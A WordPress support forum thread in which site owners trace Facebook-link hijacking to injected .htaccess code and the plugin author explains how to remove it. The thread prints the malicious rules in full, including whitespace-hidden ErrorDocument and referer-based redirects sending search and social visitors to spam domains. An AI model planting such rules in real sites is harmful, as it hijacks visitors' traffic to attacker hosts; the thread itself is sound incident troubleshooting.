[Plugin: Add Link to Facebook] links are hijacked to softwarepromo.ru

deenorris
(@deenorris)

12 years, 7 months ago

All my facebook links are being hijacked to softwarepromo.ru and eventually activationcode.ru.

When I tried to edit your plug-in, my browser makes several calls to softwarepromo.ru and then loads a bad imitation of the wordpress dashboard.

What is your relation to this domain.

Google is blocking all websites with links to my site using your plug-in

http://wordpress.org/extend/plugins/add-link-to-facebook/

Viewing 15 replies - 1 through 15 (of 34 total)

1 2 3 →

M66B
(@m66b)

12 years, 7 months ago

I have no relation to this domain.

My best guess: your WordPress installation has been hacked.

Thread Starter deenorris
(@deenorris)

12 years, 7 months ago

Yes, I am sure it has been hacked, but it is only this plugin that is affected. Someone is writing a hack specifically for this. Trying to delete the plugin causes the same poor quality fake dashboard.

M66B
(@m66b)

12 years, 7 months ago

Contact me through the contact form here and I will see what I can do for you.
Thread Starter deenorris
(@deenorris)

12 years, 7 months ago
This turns out to be a htaccess hakc-
```
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

																														ErrorDocument 400 http://promosoftware.ru/apacabar/inde.php
																														ErrorDocument 401 http://promosoftware.ru/apacabar/inde.php
																														ErrorDocument 403 http://promosoftware.ru/apacabar/inde.php
																														ErrorDocument 404 http://promosoftware.ru/apacabar/inde.php
																														ErrorDocument 500 http://promosoftware.ru/apacabar/inde.php
																														<IfModule mod_rewrite.c>
																														RewriteEngine On
																														RewriteCond %{HTTP_REFERER} .*google.* [OR]
																														RewriteCond %{HTTP_REFERER} .*ask.* [OR]
																														RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
																														RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
																														RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
																														RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
																														RewriteCond %{HTTP_REFERER} .*qq.* [OR]
																														RewriteCond %{HTTP_REFERER} .*excite.* [OR]
																														RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
																														RewriteCond %{HTTP_REFERER} .*msn.* [OR]
																														RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
																														RewriteCond %{HTTP_REFERER} .*aol.* [OR]
																														RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
																														RewriteCond %{HTTP_REFERER} .*goto.* [OR]
																														RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
																														RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
																														RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
																														RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
																														RewriteCond %{HTTP_REFERER} .*search.* [OR]
																														RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
																														RewriteCond %{HTTP_REFERER} .*bing.* [OR]
																														RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
																														RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
																														RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
																														RewriteCond %{HTTP_REFERER} .*blog.* [OR]
																														RewriteCond %{HTTP_REFERER} .*live.* [OR]
																														RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
																														RewriteCond %{HTTP_REFERER} .*mail.* [OR]
																														RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
																														RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
																														RewriteCond %{HTTP_REFERER} .*ya.* [OR]
																														RewriteCond %{HTTP_REFERER} .*aport.* [OR]
																														RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
																														RewriteCond %{HTTP_REFERER} .*flickr.*
																														RewriteRule ^(.*)$ http://promosoftware.ru/apacabar/inde.php [R=301,L]
																														</IfModule>
```
Thread Starter deenorris
(@deenorris)

12 years, 7 months ago

Be sure to scroll right to see the entire hack.

hartman27
(@hartman27)

12 years, 7 months ago

So what now? Where and how do I take care of this problem?

M66B
(@m66b)

12 years, 7 months ago

If you have this problem: edit your .htaccess file, delete the rules below the WordPress section and protect it from changing again.

To be clear: this problem has nothing to do with Add Link to Facebook itself.

hartman27
(@hartman27)

12 years, 7 months ago

Now which .htaccess file? There is one in the main area and one in the logs folder. Probably more as well. I just don’t want to kill the wrong thing and, so far, I can’t find what deenorris is showing up top. But believe me it is the problem.

M66B
(@m66b)

12 years, 7 months ago

Post the content of both .htaccess files here or use this contact form to send them to me (you will have to zip them) and I will see if I can help you with this.

My best guess it is the one in the root folder of your WordPress installation.

hartman27
(@hartman27)

12 years, 7 months ago

This is the one in the main area…

AddType x-mapp-php5 .php

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

# BEGIN Audiobar
# END Audiobar

This is the one in the logs folders

Options +Indexes
Satisfy any
Order Deny,Allow
Allow from 172.17.0.0/16
Allow from 212.227.35.64/27
Allow from 212.227.34.151
Allow from 212.227.34.190
Deny from all
RemoveType .html .gif
AuthType Basic
AuthName “Access to /logs”
AuthUserFile /kunden/homepages/24/d275942758/htpasswd
Require user u52290778

M66B
(@m66b)

12 years, 7 months ago

I don’t see any problem.
Did you scroll down and left to see if there is more hidden?

M66B
(@m66b)

12 years, 7 months ago

Concentrate on the first one, the second is probably not relevant.

hartman27
(@hartman27)

12 years, 7 months ago

GOT HIM! Here’s the better copy of the first one. (Scroll way down)

AddType x-mapp-php5 .php

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

# BEGIN Audiobar
# END Audiobar

ErrorDocument 400 http://software-promo.ru/klm/index.php
ErrorDocument 401 http://software-promo.ru/klm/index.php
ErrorDocument 403 http://software-promo.ru/klm/index.php
ErrorDocument 404 http://software-promo.ru/klm/index.php
ErrorDocument 500 http://software-promo.ru/klm/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://software-promo.ru/klm/index.php [R=301,L]
</IfModule>

hartman27
(@hartman27)

12 years, 7 months ago

Just delete everything including audiobar?
M66B
(@m66b)

12 years, 7 months ago
No, only remove:
```
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]

... up to ...

</IfModule>
```

Viewing 15 replies - 1 through 15 (of 34 total)

1 2 3 →

The topic ‘[Plugin: Add Link to Facebook] links are hijacked to softwarepromo.ru’ is closed to new replies.